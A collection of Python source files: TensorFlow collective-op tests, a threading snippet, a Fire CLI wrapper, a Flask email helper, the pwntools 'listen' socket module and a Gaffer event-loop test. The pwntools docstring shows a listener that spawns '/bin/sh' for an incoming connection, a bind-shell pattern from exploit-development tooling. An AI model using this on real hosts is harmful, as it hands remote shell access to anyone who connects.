"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
if group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
dense_shape=[5, 2])
]
self.batch_reduce_and_verify(inputs, expect, options)
def testBatchReduceMixedDenseAndSparse(self):
options = self.RunOptions(
num_processes=2,
gpus_per_process=0,
reduce_op=ReduceOp.SUM,
mode=["func_graph"])
inputs_data = [
[
1.0, 2.0,
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
],
[
3.0, 4.0,
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
],
]
expect = [
4.0, 6.0,
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
self.batch_reduce_and_verify(inputs_data, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceDense(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = constant_op.constant(1.0)
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [1.0 * group_size] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [1.0] * len(devices)
self.assertAllClose(got, expect)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (constant_op.constant(1.0), constant_op.constant(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(1.0, 2.0)] * len(devices)
self.assertAllClose(got, expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = IndexedSlices(
values=array_ops.identity([[1.]]),
indices=array_ops.identity([0]),
dense_shape=array_ops.identity([5, 1]))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
IndexedSlices([[3. * group_size]], [2], [5, 1]))
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(IndexedSlices([[1.]], [0], [5, 1]),
IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=0,
implementation=CommunicationImplementation.AUTO,
reduce_op=ReduceOp.SUM))
def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
implementation, reduce_op):
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])), array_ops.identity(1.0),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])), array_ops.identity(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
expect = [
(IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
axis=[0, 1, 2],
func_mode=["eager", "func_graph"],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
func_mode, axis, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)
def gather_fn():
per_replica_value = make_per_replica_value(value, devices)
gathered_values = collective._gather(
per_replica_value, per_replica_value, axis=axis, options=options)
gathered_values = self.as_list(gathered_values)
# Skip checking devices in eager. In eager the device attribute doesn't
# reflect the actual device of the tensor.
if not context.executing_eagerly():
self.assertAllEqual(devices, [v.device for v in gathered_values])
return [ops.convert_to_tensor(v) for v in gathered_values]
group_size = num_processes * (required_gpus or 1)
expect = array_ops.concat([value] * group_size, axis=axis)
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if func_mode == "eager":
result = gather_fn()
self.assertAllClose(result, per_replica_expect)
if func_mode == "func_graph":
result = def_function.function(gather_fn)()
self.assertAllClose(result, per_replica_expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[CommunicationImplementation.RING]))
def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
implementation):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = make_per_replica_value(constant_op.constant([1.]), devices)
@def_function.function
def reduce_fn():
def cond_body():
reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
options)
return math_ops.add_n(self.as_list(reduced)) / len(devices)
return control_flow_ops.cond(
array_ops.identity(False), cond_body, cond_body)
num_replicas = num_processes * len(devices)
self.assertAllEqual(reduce_fn(), [1. * num_replicas])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
required_gpus,
implementation,
prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = make_per_replica_value(1.0, devices)
v1 = make_per_replica_value(2.0, devices)
# Add a delay to collective_ops.all_reduce according to the input tensors
# index in `sequence.`
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v0, v0), (v0, v0)], options)
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)],
options)
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testInputsAreFunctionArgs(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
@def_function.function
def reduce_fn(v):
# Function inputs don't have device placement.
self.assertEqual(v.values[0].device, "")
self.assertEqual(v.values[1].device, "")
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
(v, v)],
options)
self.assertEqual(reduced[0].values[0].device, devices[0])
self.assertEqual(reduced[0].values[1].device, devices[1])
self.assertEqual(reduced[1].values[0].device, devices[0])
self.assertEqual(reduced[1].values[1].device, devices[1])
# Returning Mirrored only evaluates the primary value, which causes
# hanging,
return [reduced[0].values, reduced[1].values]
v = make_per_replica_value(1.0, devices)
reduced = reduce_fn(v)
self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_dense():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're three workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceDense(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_dense():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceSparse(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_sparse():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_sparse():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
def testNcclOrdering(self, num_processes, required_gpus):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(
implementation=CommunicationImplementation.NCCL)
v_dense = make_per_replica_value([1.0, 1.0], devices)
v_sparse = make_per_replica_value([
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
], devices)
@def_function.function
def nested_dense():
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
@def_function.function
def nested_sparse():
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# All collectives, function calls, if clause and while loops should be
# chained by control dependencies, so that the execution order is
# deterministic.
@def_function.function
def f():
# pylint: disable=pointless-statement
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reducing dense value.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
# reducing sparse value.
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reduce dense value in nested tf.function.
nested_dense()
# reduce sparse value in nested tf.function.
nested_sparse()
# reduce dense value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
else:
v_dense
# reduce sparse value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
v_sparse
else:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
# reduce dense value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
i += 1
# reduce sparse value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
i += 1
# reducing dense and sparse value again.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# pylint: enable=pointless-statement
graph = f.get_concrete_function().graph
should_be_ordered = set([
"CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
"StatefulPartitionedCall"
])
nodes_by_device = {}
for op in graph.get_operations():
if op.type in should_be_ordered:
if op.device not in nodes_by_device:
nodes_by_device[op.device] = []
nodes_by_device[op.device].append(op)
order = test_util.topological_sort_operations(graph.get_operations())
for device in devices:
device = device_util.canonicalize(device)
# Those function ops don't have device annotations, but they contain
# collectives for both devices so we always include them.
operations = nodes_by_device[device] + nodes_by_device[""]
# Verify that we get all types of nodes we want.
self.assertEqual(set(op.type for op in operations), should_be_ordered)
test_util.assert_sequential_execution(order, operations)
get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
# TODO(b/172304955): figure why logical devices doesn't work.
test_util.main(config_logical_devices=False)
|
p290_test1561.py
|
import threading
threadObj = threading.Thread(target=print, args=['Cats', 'Dogs', 'Forgs'], kwargs={'sep': ' & '})
threadObj.start()
"""
Cats & Dogs & Forgs
"""
|
fire_cli.py
|
import json
import sys
import threading
from io import StringIO
import fire
def json_dump(obj):
print(json.dumps(obj, indent=4, sort_keys=True, default=str)) # https://stackoverflow.com/a/11875813/973425
class Root():
"""
Root
"""
cmd_history = []
def __init__(self):
pass
def dummy_json(self):
obj = {
"key1": [
"val1",
{
"key2": "val2",
"key3": 3.6
}
]
}
json_dump(obj)
def echo(self, arg):
"""
JSON arg Tested : echo '{"a":"123", "tois":{"moins":12, "hil":["hodor", "mind"]}}'
:param arg:
:return:
"""
json_dump(arg)
def history(self):
for cmd in Root.cmd_history:
json_dump(cmd)
def main():
if len(sys.argv) > 1:
args = ""
for arg in sys.argv[1:]:
args += " " + arg
fire.Fire(Root, args)
Root.cmd_history.append(args)
else:
print("no args...")
while True:
cmd = input()
fire.Fire(Root, cmd)
Root.cmd_history.append(cmd)
def fire_task_wrapper(cmd, emit):
class TeeIn(StringIO):
def write(self, s):
emit('my response', {'stdin': s})
StringIO.write(self, s)
sys.__stdin__.write(s)
class TeeOut(StringIO):
def write(self, s):
emit('my response', {'stdout': s})
StringIO.write(self, s)
sys.__stdout__.write(s)
class TeeErr(StringIO):
def write(self, s):
emit('my response', {'stderr': s})
StringIO.write(self, s)
sys.__stderr__.write(s)
# @processify
def fire_task(command):
# Save everything that would otherwise go to stdout.
stdin = TeeIn()
sys.stdin = stdin
stdout = TeeOut()
sys.stdout = stdout
stderr = TeeErr()
sys.stderr = stderr
fire.Fire(Root, command)
pass
# fire_task(cmd)
t = threading.Thread(name='child procs', target=fire_task(cmd))
t.start()
pass
if __name__ == "__main__":
main()
|
email.py
|
from flask import render_template
from flask_mail import Message
from app import mail,app
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',user=user, token=token),
html_body=render_template('email/reset_password.html',user=user, token=token)
)
|
listen.py
|
from __future__ import absolute_import
from __future__ import division
import errno
import socket
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
log = getLogger(__name__)
class listen(sock):
r"""Creates an TCP or UDP-socket to receive data on. It supports
both IPv4 and IPv6.
The returned object supports all the methods from
:class:`pwnlib.tubes.sock` and :class:`pwnlib.tubes.tube`.
Arguments:
port(int): The port to connect to.
Defaults to a port auto-selected by the operating system.
bindaddr(str): The address to bind to.
Defaults to ``0.0.0.0`` / `::`.
fam: The string "any", "ipv4" or "ipv6" or an integer to pass to :func:`socket.getaddrinfo`.
typ: The string "tcp" or "udp" or an integer to pass to :func:`socket.getaddrinfo`.
Examples:
>>> l = listen(1234)
>>> r = remote('localhost', l.lport)
>>> _ = l.wait_for_connection()
>>> l.sendline(b'Hello')
>>> r.recvline()
b'Hello\n'
>>> l = listen()
>>> l.spawn_process('/bin/sh')
>>> r = remote('localhost', l.lport)
>>> r.sendline(b'echo Goodbye')
>>> r.recvline()
b'Goodbye\n'
"""
#: Local port
lport = 0
#: Local host
lhost = None
#: Socket type (e.g. socket.SOCK_STREAM)
type = None
#: Socket family
family = None
#: Socket protocol
protocol = None
#: Canonical name of the listening interface
canonname = None
#: Sockaddr structure that is being listened on
sockaddr = None
_accepter = None
def __init__(self, port=0, bindaddr = "0.0.0.0",
fam = "any", typ = "tcp", *args, **kwargs):
super(listen, self).__init__(*args, **kwargs)
port = int(port)
fam = {socket.AF_INET: 'ipv4',
socket.AF_INET6: 'ipv6'}.get(fam, fam)
fam = self._get_family(fam)
typ = self._get_type(typ)
if fam == socket.AF_INET6 and bindaddr == '0.0.0.0':
bindaddr = '::'
h = self.waitfor('Trying to bind to %s on port %d' % (bindaddr, port))
for res in socket.getaddrinfo(bindaddr, port, fam, typ, 0, socket.AI_PASSIVE):
self.family, self.type, self.proto, self.canonname, self.sockaddr = res
if self.type not in [socket.SOCK_STREAM, socket.SOCK_DGRAM]:
continue
h.status("Trying %s" % self.sockaddr[0])
listen_sock = socket.socket(self.family, self.type, self.proto)
listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_sock.bind(self.sockaddr)
self.lhost, self.lport = listen_sock.getsockname()[:2]
if self.type == socket.SOCK_STREAM:
listen_sock.listen(1)
break
else:
h.failure()
self.error("Could not bind to %s on port %d" % (bindaddr, port))
h.success()
h = self.waitfor('Waiting for connections on %s:%s' % (self.lhost, self.lport))
def accepter():
while True:
try:
if self.type == socket.SOCK_STREAM:
self.sock, rhost = listen_sock.accept()
listen_sock.close()
else:
data, rhost = listen_sock.recvfrom(4096)
listen_sock.connect(rhost)
self.sock = listen_sock
self.unrecv(data)
self.settimeout(self.timeout)
break
except socket.error as e:
if e.errno == errno.EINTR:
continue
h.failure()
self.exception("Socket failure while waiting for connection")
self.sock = None
return
self.rhost, self.rport = rhost[:2]
h.success('Got connection from %s on port %d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def spawn_process(self, *args, **kwargs):
def accepter():
self.wait_for_connection()
self.sock.setblocking(1)
p = super(listen, self).spawn_process(*args, **kwargs)
p.wait()
self.close()
t = context.Thread(target = accepter)
t.daemon = True
t.start()
def wait_for_connection(self):
"""Blocks until a connection has been established."""
self.sock
return self
def __getattr__(self, key):
if key == 'sock':
self._accepter.join(timeout = self.timeout)
if 'sock' in self.__dict__:
return self.sock
else:
return None
else:
return getattr(super(listen, self), key)
def close(self):
# since `close` is scheduled to run on exit we must check that we got
# a connection or the program will hang in the `join` call above
if self._accepter and self._accepter.is_alive():
return
super(listen, self).close()
|
EventLoopTest.py
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import time
import functools
import IECore
import Gaffer
import GafferUI
import GafferUITest
from Qt import QtCore
from Qt import QtWidgets
class EventLoopTest( GafferUITest.TestCase ) :
def testIdleCallbacks( self ) :
self.__idleCalls = 0
def idle() :
self.__idleCalls += 1
return self.__idleCalls < 2
def stop() :
if self.__idleCalls==2 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
return True
GafferUI.EventLoop.addIdleCallback( idle )
GafferUI.EventLoop.addIdleCallback( stop )
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__idleCalls, 2 )
def testWaitForIdle( self ) :
self.__idleCalls = 0
def idle( total ) :
self.__idleCalls += 1
return self.__idleCalls < total
GafferUI.EventLoop.addIdleCallback( functools.partial( idle, 1000 ) )
GafferUI.EventLoop.waitForIdle()
self.assertEqual( self.__idleCalls, 1000 )
GafferUI.EventLoop.addIdleCallback( functools.partial( idle, 1005 ) )
GafferUI.EventLoop.waitForIdle( 5 )
self.assertEqual( self.__idleCalls, 1005 )
def testExecuteOnUITheadAndWaitForResult( self ) :
def f() :
GafferUI.EventLoop.mainEventLoop().stop()
self.__uiThreadFunctionCalled = True
self.__uiThreadCalledOnCorrectThread = QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread()
return 101
def t() :
self.__uiThreadResult = GafferUI.EventLoop.executeOnUIThread( f, waitForResult=True )
thread = threading.Thread( target = t )
GafferUI.EventLoop.addIdleCallback( thread.start )
GafferUI.EventLoop.mainEventLoop().start()
thread.join()
self.assertEqual( self.__uiThreadFunctionCalled, True )
self.assertEqual( self.__uiThreadCalledOnCorrectThread, True )
